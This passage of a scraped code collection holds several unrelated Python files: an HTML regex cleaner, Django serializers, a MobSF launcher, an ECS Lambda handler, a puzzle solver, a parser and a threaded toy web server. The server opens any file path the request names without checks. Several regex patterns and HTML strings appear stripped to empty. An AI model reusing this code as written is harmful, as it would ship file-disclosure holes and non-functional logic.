\"C:\\\\temp\"\nfiles = os.listdir(path)\n\nREGEXES = [(re.compile(r''), ''),\n           (re.compile(r' '), ''),\n           (re.compile(r' style=\"list-style: decimal;\"'), ''),\n           (re.compile(r'\\s*'), ''),\n           (re.compile(r'\\s*'), ''),\n           (re.compile(r''), ''),\n           (re.compile(r'\\s*()\\s*'), r'\\1'),\n           (re.compile(r'\"(.*?)\"'), r'\\1'),\n           (re.compile(r'(.*?)'), r'\\1'),\n           (re.compile(r'(.*?)'), r'\\1'),\n           (re.compile(r'(.*?)'), r'\\1'),\n           (re.compile(r'(.*?)'), r'\\1'),\n           (re.compile(r'(.*?)'), r'\\1
      ')]\n\nfor f in files:\n file_name, file_extension = os.path.splitext(f)\n\n if file_extension in ('.htm', '.html'):\n generated_output_file = file_name + \"_regex\" + file_extension\n\n input_file = os.path.join(path, f)\n output_file = os.path.join(path, generated_output_file)\n\n with open(input_file, \"r\") as fi, open(output_file, \"w+\") as fo:\n file_content = fi.read()\n # file_content = htmlmin.minify(file_content, remove_optional_attribute_quotes=False, reduce_empty_attributes=False, pre_tags=(u'img'), remove_empty_space=True)\n for search, replace in REGEXES:\n file_content = search.sub(replace, file_content)\n fo.write(file_content)\n\n # Overwrite original file\n shutil.move(output_file, input_file)\n","repo_name":"lvaylet/html_sanitizer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18491529752","text":"from orderbookbase import *\n\nclass OrderBook__model(OrderBookBase):\n def config(self):\n self.market = \"_model\"\n self.shortmarketname = \"_model\"\n\n #if self.cur2!=\"EUR\" or self.cur1!=\"BTC\":\n # raise(Exception(\"BTCUSD only\"))\n if not (self.cur2 in [\"USD\", \"EUR\"]) or self.cur1!=\"BTC\":\n raise(Exception(\"Symbol {symbol} not supported\".format(symbol=self.symbol)))\n #raise(Exception(\"BTCUSD or BTCUSD\"))\n\n self.url = \"https://www.....json\"\n \n raise(Exception(\"ToDo\"))\n\n def convert_to_DataFrame(self):\n cur1_amount = \"{cur1}_amount\".format(cur1=self.cur1.lower())\n columns = ['price', cur1_amount]\n \n try:\n self.orders['asks'] = pd.DataFrame(self.data['asks'], columns=columns)\n except:\n self.orders['asks'] = pd.DataFrame(columns=columns)\n \n try:\n self.orders['bids'] = pd.DataFrame(self.data['bids'], columns=columns)\n except:\n self.orders['bids'] = pd.DataFrame(columns=columns)\n \n self.convert_data() # convert unicode to float","repo_name":"Amrt1n3zm/working4arbitrage","sub_path":"working4arbitrage/trunk/src/orderbook__model.py","file_name":"orderbook__model.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"4111505290","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer\n\nfrom django.contrib.contenttypes.models import ContentType\n\nfrom mit.models import (\n Faculty,\n WorkType,\n GenericWork,\n PublicationInfo,\n CourseInfo,\n Topic,\n Location,\n )\n\nclass ContentTypeSerializer(ModelSerializer):\n class Meta:\n model = ContentType\n\nclass FacultySerializer(ModelSerializer):\n class Meta:\n model = Faculty\n\nclass TopicSerializer(ModelSerializer):\n class Meta:\n model = Topic\n\nclass LocationSerializer(ModelSerializer):\n class Meta:\n model = Location\n\nclass WorkTypeSerializer(ModelSerializer):\n class Meta:\n model = WorkType\n\nclass CourseInfoSerializer(ModelSerializer):\n semesters = serializers.RelatedField(many=True)\n class Meta:\n model = CourseInfo\n fields = (\n 'course_codes',\n 'is_studio',\n 'is_workshop',\n 'is_practicum',\n 'semesters',\n )\n\nclass PublicationInfoSerializer(ModelSerializer):\n medium = serializers.RelatedField()\n publishers = serializers.RelatedField(many=True)\n periodicals = serializers.RelatedField(many=True)\n class Meta:\n model = PublicationInfo\n fields = (\n 'date_published',\n 'publishers',\n 'periodicals',\n 'medium',\n )\n\nclass GenericWorkSerializer(ModelSerializer):\n 
publicationinfo = PublicationInfoSerializer()\n courseinfo = CourseInfoSerializer()\n class Meta:\n model = GenericWork\n fields = (\n 'work_types',\n 'title',\n 'faculty',\n 'website',\n 'topics',\n 'locations',\n 'non_dusp_collaborators',\n 'start_date',\n 'end_date',\n 'subworks',\n 'publicationinfo',\n 'courseinfo',\n )\n\n\n\n\n\n","repo_name":"bengolder/explorer","sub_path":"explorer/mit/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25338284600","text":"import os\nimport sys\nimport platform\n\nfrom django.core.management import execute_from_command_line\nfrom django.db import connection\n\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mobsf.MobSF.settings')\n\n\ndef db():\n execute_from_command_line([\n '',\n 'makemigrations',\n ])\n execute_from_command_line([\n '',\n 'makemigrations',\n 'StaticAnalyzer',\n ])\n execute_from_command_line([\n '',\n 'migrate',\n ])\n\n\ndef main():\n try:\n if not connection.introspection.table_names():\n db()\n except Exception:\n db()\n listen = '127.0.0.1:8000'\n if len(sys.argv) == 2 and sys.argv[1]:\n if sys.argv[1] == 'db':\n db()\n listen = None\n elif sys.argv[1]:\n listen = sys.argv[1]\n if not listen:\n exit(0)\n if platform.system() != 'Windows':\n sys.argv = [\n '',\n '-b',\n listen,\n 'mobsf.MobSF.wsgi:application',\n '--workers=1',\n '--threads=10',\n '--timeout=3600',\n '--log-level=citical',\n '--log-file=-',\n '--access-logfile=-',\n '--error-logfile=-',\n '--capture-output',\n ]\n from gunicorn.app.wsgiapp import run\n run()\n else:\n from waitress import serve\n from .MobSF import wsgi\n serve(\n wsgi.application,\n listen=listen,\n threads=10,\n channel_timeout=3600)\n","repo_name":"MobSF/Mobile-Security-Framework-MobSF","sub_path":"mobsf/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":15251,"dataset":"github-code","pt":"67"} +{"seq_id":"5701639682","text":"# -*- coding: utf-8 -*-\r\nimport math\r\nfrom .tfidf import top\r\nfrom .config import *\r\nfrom .keyword_extraction import Doc\r\nimport urllib.request\r\nimport re\r\nimport os\r\nimport requests\r\n\r\nclass CandidateSearch():\r\n @staticmethod\r\n def _search(n, list_keyword):\r\n # t = time.time()\r\n url = 'http://202.191.57.85:8080/APISearchEs/SearchLimited/SearchESLimitFile?numberFile=' + str(n) + '&keyword='\r\n for keyword_ in list_keyword:\r\n keyword = re.sub('_',' ',keyword_)\r\n url = url + keyword + '+'\r\n url = url[:-1]\r\n r = requests.get(url)\r\n return r.json()[\"hits\"][\"hits\"]\r\n\r\n @staticmethod\r\n def search(num_file, text, log_file=None):\r\n doc = Doc(text)\r\n list_keyword = doc.getKeyWord()\r\n result = CandidateSearch._search(num_file, list_keyword)\r\n if log_file is not None:\r\n with open(log_file, 'w+', encoding='utf-8') as file:\r\n file.write(str(list_keyword))\r\n file.write('\\n\\n')\r\n file.write(json.dumps(result))\r\n return result\r\n\r\nimport json\r\nimport sys\r\nif __name__ == \"__main__\":\r\n num_file = sys.argv[1]\r\n filepath = sys.argv[2]\r\n log_file = None\r\n try:\r\n log_file = sys.argv[3]\r\n except:\r\n pass\r\n text = open(filepath, \"r\", encoding=\"utf-8\").read()\r\n print(json.dumps(CandidateSearch.search(num_file, text, log_file)))\r\n\r\n\"\"\"\r\npython -m candidate_search.run 12 
\"E:/1.txt\"\r\n\"\"\"","repo_name":"TrinhHaiSon/PlagiarismDetection","sub_path":"candidate_search/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"21191902390","text":"#import socket module\r\nimport sys\r\nimport threading\r\nimport time\r\nfrom socket import *\r\ndef server(connectionSocket):\r\n print (\"Starting a new thread\")\r\n try:\r\n message = connectionSocket.recv(1024)\r\n print(message)\r\n if(message != \"\"):\r\n filename = message.split()[1]\r\n print(\"looking for file \", filename)\r\n f = open(filename[1:])\r\n outputdata = f.read()\r\n extension = filename.split(\".\")[1]\r\n \r\n if(extension == \"gif\"):\r\n content = \"image/gif\"\r\n elif(extension == \"jpeg\"):\r\n content = \"image/jpeg\"\r\n elif(extension == \"png\"):\r\n content = \"image/png\"\r\n else:\r\n content = \"text/html\"\r\n \r\n #Send one HTTP header line into socket\r\n Myheader = \"HTTP/1.1 200 OK\\r\\nContent-Type: \" + content + \"\\r\\n\\r\\n\"\r\n print (Myheader)\r\n print(outputdata)\r\n connectionSocket.sendall(Myheader)\r\n print (Myheader)\r\n print(outputdata)\r\n #Send the content of the requested file to the client\r\n for i in range(0, len(outputdata)):\r\n connectionSocket.send(outputdata[i])\r\n connectionSocket.close()\r\n \r\n except IOError:\r\n if(filename == \"/helloworld.html\"):\r\n connectionSocket.send(\"HTTP/1.1 301 Moved Permanently\\r\\n Location: http://www.hello_world2.html\\r\\n\\r\\n\")\r\n connectionSocket.send(\"
<html><body><h1>301 Moved Permanently</h1></body></html>\\r\\n\")\r\n        else:\r\n            #Send response message for file not found\r\n            connectionSocket.send(\"HTTP/1.1 404 Not Found\\r\\n\\r\\n\")\r\n            connectionSocket.send(\"<html><body><h1>404 Not Found</h1></body></html>
      \\r\\n\")\r\n #Close client socket\r\n connectionSocket.close()\r\n return\r\n\r\nserverSocket = socket(AF_INET, SOCK_STREAM)\r\n#Prepare a sever socket\r\nHOST = 'localhost'\r\nPORT = 8888\r\ntry:\r\n serverSocket.bind((HOST, PORT))\r\nexcept:\r\n sys.exit\r\n\r\nserverSocket.listen(10)\r\n\r\n\r\n\r\n\r\n \r\nwhile True:\r\n #Establish the connection\r\n print ('Ready to serve...')\r\n connectionSocket, addr = serverSocket.accept()\r\n threads = []\r\n t = threading.Thread(target=server, args=(connectionSocket,))\r\n threads.append(t)\r\n t.start()\r\n \r\nserverSocket.close()\r\n \r\n","repo_name":"djford/College-Projects","sub_path":"Client + Server/server2.py","file_name":"server2.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26489031484","text":"\"\"\"\nThis is a Lambda function to be triggered from CloudWatch Events (ECS Task Stopped).\n\"\"\"\nimport boto3\nimport json\nimport logging\n\n\n# Update the root logger to get messages at DEBUG and above\nlogging.getLogger().setLevel(logging.DEBUG)\nlogging.getLogger(\"botocore\").setLevel(logging.CRITICAL)\nlogging.getLogger(\"boto3\").setLevel(logging.CRITICAL)\nlogging.getLogger(\"urllib3.connectionpool\").setLevel(logging.CRITICAL)\n\nlogging.info(f\"boto3.__version__: {boto3.__version__}\")\n\n\ndef lambda_handler(event, context):\n \"\"\"\n Main entry point when triggering the AWS Lambda function.\n\n :param event: a dictionary of event information from AWS ECS Task Stopped event\n :param context: a dictionary of runtime information from AWS ECS\n\n Example of `event`: (taskArn is the task_id in DynamoDB)\n \"version\": \"0\",\n \"id\": \"xxxx\",\n \"detail-type\": \"ECS Task State Change\",\n \"source\": \"aws.ecs\",\n \"account\": \"111122223333\",\n \"time\": \"2019-06-30T03:36:57Z\",\n \"region\": \"ap-southeast-2\",\n \"resources\": [\n \"arn:aws:ecs:ap-southeast-2:111122223333:task/xxxx\"\n ],\n \"detail\": {\n \"clusterArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:cluster/Orca-Cluster\",\n \"containerInstanceArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:container-instance/xxxx\",\n \"containers\": [\n {\n \"containerArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:container/xxxx\",\n \"exitCode\": 1,\n \"lastStatus\": \"STOPPED\",\n \"name\": \"sample_app-1_0_0\",\n \"taskArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:task/xxxx\",\n \"networkInterfaces\": [],\n \"cpu\": \"4\",\n \"memory\": \"1024\"\n }\n ],\n \"createdAt\": \"2019-06-30T03:36:53.763Z\",\n \"launchType\": \"EC2\",\n \"cpu\": \"4\",\n \"memory\": \"1024\",\n \"desiredStatus\": \"STOPPED\",\n \"group\": \"family:sample_app-1_0_0\",\n \"lastStatus\": \"STOPPED\",\n \"overrides\": {\n \"containerOverrides\": [\n {\n \"environment\": [\n {\n \"name\": \"S3_BUCKET\",\n \"value\": \"bucket-name-xxx\"\n }\n ],\n \"name\": \"sample_app-1_0_0\"\n }\n ]\n },\n \"attachments\": [],\n \"connectivity\": \"CONNECTED\",\n \"connectivityAt\": \"2019-06-30T03:36:53.763Z\",\n \"pullStartedAt\": \"2019-06-30T03:36:55.311Z\",\n \"startedAt\": \"2019-06-30T03:36:56.311Z\",\n \"stoppingAt\": \"2019-06-30T03:36:57.935Z\",\n \"stoppedAt\": \"2019-06-30T03:36:57.935Z\",\n \"pullStoppedAt\": \"2019-06-30T03:36:55.311Z\",\n \"executionStoppedAt\": \"2019-06-30T03:36:57Z\",\n \"stoppedReason\": \"Essential container in task exited\",\n \"stopCode\": \"EssentialContainerExited\",\n \"updatedAt\": \"2019-06-30T03:36:57.935Z\",\n \"taskArn\": 
\"arn:aws:ecs:ap-southeast-2:111122223333:task/xxxx\",\n \"taskDefinitionArn\": \"arn:aws:ecs:ap-southeast-2:111122223333:task-definition/sample_app-1_0_0:1\",\n \"version\": 3\n }\n }\n \"\"\"\n logging.debug(\"Received event: \" + json.dumps(event))\n\n if event[\"source\"] != \"aws.ecs\":\n raise ValueError(\"Function only supports input from events with a source type of: aws.ecs\")\n\n # Extract data from event\n params = {\n \"timestamp\": event[\"detail\"][\"stoppedAt\"],\n \"task_arn\": event[\"detail\"][\"taskArn\"],\n \"other_env_data\": event[\"detail\"][\"overrides\"][\"containerOverrides\"][0][\"environment\"],\n }\n return process_ecs_task_stopped_event(params)\n\n\ndef process_ecs_task_stopped_event(params):\n # TODO\n return 0\n","repo_name":"kyhau/aws-tools","sub_path":"ECS/ecs-taskstopped-handling/lambda/TaskStoppedHandler.py","file_name":"TaskStoppedHandler.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"67"} +{"seq_id":"29850807880","text":"'''\nCreated on May 14, 2015\n\n@author: finn\n\nAlbert and Bernard just became friends with Cheryl, and they want to know when her birtxhday is. \nCheryl gave them a list of 10 possible dates:\n\n May 15 May 16 May 19\n June 17 June 18\n July 14 July 16\n August 14 August 15 August 17\n\nCheryl then tells Albert and Bernard separately the month and the day of the birthday respectively.\n\n1) Albert: I don't know when Cheryl's birthday is, but I know that Bernard does not know too.\n\n2) Bernard: At first I don't know when Cheryl's birthday is, but I know now.\n\n3) Albert: Then I also know when Cheryl's birthday is.\n\n4) So when is Cheryl's birthday?\n'''\n\n\nif __name__ == '__main__':\n candidates = [(\"May\", 15), (\"May\", 16), (\"May\", 19),\n (\"June\", 17), (\"June\", 18),\n (\"July\", 14), (\"July\", 16),\n (\"August\", 14), (\"August\", 15), (\"August\", 17)]\n months = [md[0] for md in candidates] # set(md[0] for md in candidates)\n days = [md[1] for md in candidates] # set(md[1] for md in candidates)\n\n a1 = [md for md in candidates if md[1] in [d for d in days if days.count(d) > 1]]\n a1_excludes = [md for md in candidates if md not in a1]\n b1 = [md for md in a1 if md[0] not in [m[0] for m in a1_excludes] \n and md[1] in [mdd[1] for mdd in candidates if mdd[0] in [mm[0] for mm in a1_excludes]]]\n a2 = [md for md in b1 if [m[0] for m in b1].count(md[0]) == 1]\n \n print(\"a1\", a1)\n print(\"a1_excludes\", a1_excludes)\n print(\"b1\", b1)\n print(\"a2\", a2)\n \n ","repo_name":"finnrj/python-proj","sub_path":"py-euler/cheryls_birthday.py","file_name":"cheryls_birthday.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"28691886008","text":"import importlib\nfrom abc import ABC, abstractmethod\nfrom typing import Any, Callable, Collection, List\n\nfrom src.ast import (\n AssStmt,\n Assign,\n BlockStmt,\n BreakStmt,\n CallExpr,\n ClassDecl,\n ContinueStmt,\n Expr,\n ExprStmt,\n FunctionDecl,\n GroupingExpr,\n IfStmt,\n ImportStmt,\n Literal,\n ObjRef,\n PropertyAccess,\n ReturnStmt,\n SetProperty,\n Stmt,\n Stmts,\n SuperRef,\n UnaryExpr,\n VarAccess,\n WhileStmt,\n)\nfrom src.error_handler import ErrorHandler\nfrom src.Lexer import Token, TokenType\nfrom src.errors import UnexpectedTokenException\n\n\nclass Parser(ABC):\n def __init__(self, tokens: List[Token]) -> None:\n self.tokens = tokens\n self.index = 0\n self.lookahead = 
self.tokens[self.index]\n\n @abstractmethod\n def _parse_error(self, message: str, throw: bool = True) -> None:\n pass\n\n def is_eof(self) -> bool:\n return self.lookahead.type == TokenType.EOF\n\n def advance(self) -> Token:\n if self.is_eof():\n return self.tokens[-1]\n token = self.lookahead\n self.consume()\n return token\n\n def consume(self) -> None:\n self.index += 1\n if not self.is_eof():\n self.lookahead = self.tokens[self.index]\n\n def is_type_in(self, *token_types) -> bool:\n return self.lookahead.type in token_types\n\n def match(self, expected_type: TokenType, message: str) -> None:\n \"\"\"match() is a support method in the Parser that consumes a token T if T is the current\n lookahead token. If there is a mismatch, match() throws an exception.\"\"\"\n if self.is_type_in(expected_type):\n self.consume()\n else:\n self._parse_error(message)\n\n @abstractmethod\n def parse(self):\n pass\n\n\ndef binary_node(name: str, *token_types: Collection[TokenType]):\n module = importlib.import_module(\"src.ast\")\n\n def binary_node_creator(f: Callable):\n def binary_wrapper(parser: Parser):\n left = f(parser)\n while parser.is_type_in(*token_types):\n operator = parser.advance()\n left = getattr(module, name)(left, operator, f(parser))\n return left\n\n return binary_wrapper\n\n return binary_node_creator\n\n\nclass RecursiveDescentParser(Parser):\n def __init__(self, tokens: List[Token], error_handler: ErrorHandler) -> None:\n super().__init__(tokens)\n self.error_handler = error_handler\n self.loop_count = 0\n\n def _parse_error(self, message: str, throw: bool = True) -> None:\n message = f\"Line[{self.lookahead.line}]: at {self.lookahead} \" + message\n self.error_handler.error(message)\n if throw:\n raise UnexpectedTokenException()\n\n # TODO: Add support for error recovery\n def _synchronize(self) -> None:\n \"\"\"Synchronize at statement boundaries which in my case are newlines.\n Keywords starting off statements are also synchronization words.\"\"\"\n sync_token = self.advance() # toss mismatched token\n while not self.is_eof():\n if sync_token.type == TokenType.NEWLINE:\n return\n elif self.is_type_in(\n TokenType.IMPORT,\n TokenType.DEF,\n TokenType.WHILE,\n TokenType.IF,\n TokenType.NEWVAR,\n TokenType.CONTINUE,\n TokenType.BREAK,\n TokenType.RETURN,\n ):\n return\n sync_token = self.advance()\n\n def parse(self) -> Any:\n stmts = []\n while self.is_type_in(TokenType.IMPORT, TokenType.COLON):\n stmts.append(self._import())\n while not self.is_eof():\n stmts.append(self._declaration())\n return Stmts(stmts)\n\n def _import(self) -> ImportStmt:\n try:\n import_tok = self.advance()\n name = self._qualified_name()\n imported_elements = None\n if import_tok.type == TokenType.COLON:\n self.match(\n TokenType.IMPORT,\n \"Expect 'gaijin' in import statement starting with ':'.\",\n )\n imported_elements = self._imported_elements()\n self.match(TokenType.NEWLINE, \"Expect newline after import statement.\")\n return ImportStmt(import_tok, name, imported_elements)\n except UnexpectedTokenException:\n self._synchronize()\n\n def _qualified_name(self) -> str:\n name = \"\"\n while self.is_type_in(TokenType.DOT):\n self.advance()\n name += \".\"\n\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'gaijin'.\")\n name += self.advance().value\n while self.is_type_in(TokenType.DOT):\n self.advance()\n name += \".\"\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after '.' 
in module name.\")\n name += self.advance().value\n\n return name\n\n def _imported_elements(self) -> List[Token]:\n imports = []\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'gaijin'.\")\n imports.append(self.advance())\n while self.is_type_in(TokenType.COMMA):\n self.advance()\n if self.is_type_in(TokenType.IDENTIFIER):\n imports.append(self.advance())\n else:\n self._parse_error(\n \"Expect identifier after ',' in import declaration list.\"\n )\n return imports\n\n def _declaration(self) -> Stmt:\n try:\n if self.is_type_in(TokenType.DECORATOR):\n return self._decorator()\n if self.is_type_in(TokenType.DEF):\n return self._function_decl()\n if self.is_type_in(TokenType.CLASS):\n return self._class_decl()\n return self._statement()\n except UnexpectedTokenException as ue:\n self._synchronize()\n\n def _class_decl(self) -> Stmt:\n self.advance() # consume waifu token\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'waifu'.\")\n name = self.advance()\n\n supercls = None\n if self.is_type_in(TokenType.EXTENDS):\n supercls = self._parse_superclasses()\n\n self.match(TokenType.COLON, \"Expect colon after waifu declaration.\")\n self.match(TokenType.NEWLINE, \"Expect Newline character after ':'.\")\n self.match(TokenType.INDENT, \"Expect indent after block creation.\")\n\n methods = []\n while self.is_type_in(TokenType.DEF, TokenType.STATIC):\n methods.append(self._function_decl(self.is_type_in(TokenType.STATIC)))\n self.match(TokenType.DEDENT, \"Expect dedent after leaving the class body.\")\n return ClassDecl(name, supercls, methods)\n\n def _parse_superclasses(self) -> List[VarAccess]:\n self.advance() # consume neesan token\n supercls = []\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'neesan'.\")\n supercls.append(VarAccess(self.advance()))\n while self.is_type_in(TokenType.COMMA):\n self.advance()\n if self.is_type_in(TokenType.IDENTIFIER):\n supercls.append(VarAccess(self.advance()))\n else:\n self._parse_error(\"Expect identifier after ',' in neesan clause.\")\n return supercls\n\n def _function_decl(self, static: bool = False) -> Stmt:\n self.advance() # consume desu/oppai token\n return self._function(static)\n\n def _function(self, static: bool = False) -> FunctionDecl:\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after 'desu'.\")\n name = self.advance()\n self.match(TokenType.OP_PAR, \"Expect '(' after function name.\")\n params = self._formal_params()\n self.match(TokenType.CL_PAR, \"Expect ')' after function parameters.\")\n if not self.is_type_in(TokenType.COLON):\n self._parse_error(\n \"Expect ':' for block creation after function parameters.\"\n )\n body = self._block_stmt()\n return FunctionDecl(None, name, params, body, static)\n\n def _formal_params(self) -> List[Token]:\n params = []\n if not self.is_type_in(TokenType.CL_PAR):\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier in function parameters.\")\n params.append(self.advance())\n while self.is_type_in(TokenType.COMMA):\n self.advance()\n if len(params) > 127:\n self._parse_error(\"Maximum number of parameters is 127.\", False)\n if not self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier in function parameters.\")\n params.append(self.advance())\n\n return params\n\n def _decorator(self) -> FunctionDecl:\n self.advance() # eat @\n if not 
self.is_type_in(TokenType.IDENTIFIER):\n self._parse_error(\"Expect identifier after '@' in decorated function.\")\n name = self.advance()\n self.match(TokenType.NEWLINE, \"Expect newline after decorator.\")\n func = self._function_decl()\n func.decorator = VarAccess(name)\n return func\n\n def _statement(self) -> Stmt:\n if self.is_type_in(TokenType.IF):\n return self._if_stmt()\n if self.is_type_in(TokenType.WHILE):\n return self._while_stmt()\n if self.is_type_in(TokenType.BREAK):\n return self._break_stmt()\n if self.is_type_in(TokenType.CONTINUE):\n return self._continue_stmt()\n if self.is_type_in(TokenType.RETURN):\n return self._return_stmt()\n if self.is_type_in(TokenType.NEWVAR):\n return self._new_var()\n\n # All valid assignment targets are expressions -> parsing\n # expressions parses assignment targets\n expr = self._expression()\n if self.is_type_in(TokenType.ASSIGNMENT):\n return self._assign_stmt(expr)\n return self._expression_stmt(expr)\n\n def _break_stmt(self) -> BreakStmt:\n if self.loop_count <= 0:\n self._parse_error(\"Can only use yamero in a loop body.\", False)\n self.advance()\n self.match(TokenType.NEWLINE, \"Expect newline character after yamero.\")\n return BreakStmt()\n\n def _continue_stmt(self) -> ContinueStmt:\n if self.loop_count <= 0:\n self._parse_error(\"Can only use kowai in a loop body.\", False)\n self.advance()\n self.match(TokenType.NEWLINE, \"Expect newline character after kowai.\")\n return ContinueStmt()\n\n def _return_stmt(self) -> ReturnStmt:\n err = self.advance() # consume return\n expr = None\n if not self.is_type_in(TokenType.NEWLINE):\n expr = self._expression()\n self.match(TokenType.NEWLINE, \"Expect newline character after return.\")\n return ReturnStmt(err, expr)\n\n def _while_stmt(self) -> WhileStmt:\n try:\n self.loop_count += 1\n self.advance() # eat while token\n condition = self._expression()\n if not self.is_type_in(TokenType.COLON):\n self._parse_error(\"Expect ':' for block creation after while.\")\n block = BlockStmt(self._block_stmt())\n return WhileStmt(condition, block)\n finally:\n self.loop_count -= 1\n\n def _if_stmt(self) -> IfStmt:\n self.advance() # eat if token\n condition = self._expression()\n # TODO: Prolly cleaner to match before trying to parse a block\n if not self.is_type_in(TokenType.COLON):\n self._parse_error(\"Expect ':' for block creation after if.\")\n block = BlockStmt(self._block_stmt())\n\n alternative = None\n if self.is_type_in(TokenType.ELSE):\n self.advance()\n if not self.is_type_in(TokenType.COLON):\n self._parse_error(\"Expect ':' for block creation after else.\")\n alternative = BlockStmt(self._block_stmt())\n\n return IfStmt(condition, block, alternative)\n\n def _block_stmt(self) -> List[Stmt]:\n stmts = []\n self.advance() # Eat the colon\n self.match(TokenType.NEWLINE, \"Expect newline character after colon.\")\n self.match(TokenType.INDENT, \"Expect indent after block creation.\")\n while not self.is_type_in(TokenType.DEDENT, TokenType.EOF):\n stmts.append(self._declaration())\n\n self.match(TokenType.DEDENT, \"Expect dedent after block end.\")\n if not stmts:\n self._parse_error(\"Block may not be empty.\", False)\n return stmts\n\n def _expression_stmt(self, expr: Expr) -> ExprStmt:\n message = \"Expect newline character after statement.\"\n self.match(TokenType.NEWLINE, message)\n return ExprStmt(expr)\n\n def _assign_stmt(self, expr: Expr, new_var: bool = False) -> Stmt:\n \"\"\"Wraps a sequence of assignment expressions in a statement form. 
If called\n from the new_var method, assignments correspond to variable definitions.\n Feels somewhat weird to separate assignments like this.\"\"\"\n self.advance()\n if type(expr) is VarAccess:\n ass_stmt = AssStmt(new_var, expr.name, self._assign(new_var))\n message = \"Expect newline character after assignment.\"\n self.match(TokenType.NEWLINE, message)\n return ass_stmt\n elif type(expr) is PropertyAccess:\n if new_var:\n self._parse_error(\"Can't use 'baka' when setting properties.\", False)\n setter = SetProperty(expr.obj, expr.name, self._assign(new_var))\n message = \"Expect newline character after setting a property.\"\n self.match(TokenType.NEWLINE, message)\n return setter\n else:\n self._parse_error(\"Can't assign to this left hand side.\", False)\n\n def _assign(self, new_var: bool = False) -> Expr:\n \"\"\"Expression part of an assignment. Basically the same code as in _assign_stmt.\"\"\"\n expr = self._expression()\n if self.is_type_in(TokenType.ASSIGNMENT):\n self.advance()\n if type(expr) is VarAccess:\n return Assign(new_var, expr.name, self._assign(new_var))\n elif type(expr) is PropertyAccess:\n return SetProperty(expr.obj, expr.name, self._assign(new_var))\n else:\n self._parse_error(\"Can't assign to this left hand side.\", False)\n self._assign(new_var) # Recover from error and continue parsing\n return expr\n\n def _new_var(self) -> AssStmt:\n \"\"\"Called when baka is read, then an assignment needs to communicate\n the runtime to create a new variable in the current scope.\"\"\"\n self.advance()\n expr = self._expression()\n if not self.is_type_in(TokenType.ASSIGNMENT):\n self._parse_error(\"Can only use 'baka' in assignments.\")\n return self._assign_stmt(expr, True)\n\n def _expression(self) -> Expr:\n return self._lambda()\n\n def _lambda(self) -> Expr:\n \"\"\"Instead of using a new node for lambda expressions, lambdas are desugared to function\n declarations, where the name of the function will be the empty string.\"\"\"\n if self.is_type_in(TokenType.QUESTION):\n token = self.advance()\n params = (\n self._formal_params() if self.is_type_in(TokenType.IDENTIFIER) else []\n )\n self.match(TokenType.COLON, \"Expect ':' after lambda expression.\")\n expr = FunctionDecl(\n None,\n Token(\"\", token.line, TokenType.IDENTIFIER),\n params,\n [ReturnStmt(token, self._lambda())],\n )\n else:\n expr = self._logic_or()\n return expr\n\n @binary_node(\"LogicalExpr\", TokenType.OR)\n def _logic_or(self) -> Expr:\n return self._logic_and()\n\n @binary_node(\"LogicalExpr\", TokenType.AND)\n def _logic_and(self) -> Expr:\n return self._equality()\n\n @binary_node(\"BinaryExpr\", TokenType.UNEQUAL, TokenType.EQUAL)\n def _equality(self) -> Expr:\n return self._comparison()\n\n @binary_node(\n \"BinaryExpr\",\n TokenType.LESS,\n TokenType.LESS_EQ,\n TokenType.GREATER,\n TokenType.GREATER_EQ,\n )\n def _comparison(self) -> Expr:\n return self._term()\n\n @binary_node(\"BinaryExpr\", TokenType.PLUS, TokenType.MINUS)\n def _term(self) -> Expr:\n return self._factor()\n\n @binary_node(\"BinaryExpr\", TokenType.TIMES, TokenType.DIVIDE)\n def _factor(self) -> Expr:\n return self._unary()\n\n def _unary(self) -> Expr:\n if self.is_type_in(TokenType.NOT, TokenType.MINUS):\n operator = self.advance()\n return UnaryExpr(operator, self._unary())\n return self._call()\n\n def _call(self) -> Expr:\n expr = self._primary()\n while self.is_type_in(TokenType.OP_PAR, TokenType.DOT):\n if self.is_type_in(TokenType.OP_PAR):\n expr = self._handle_call(expr)\n else:\n expr = 
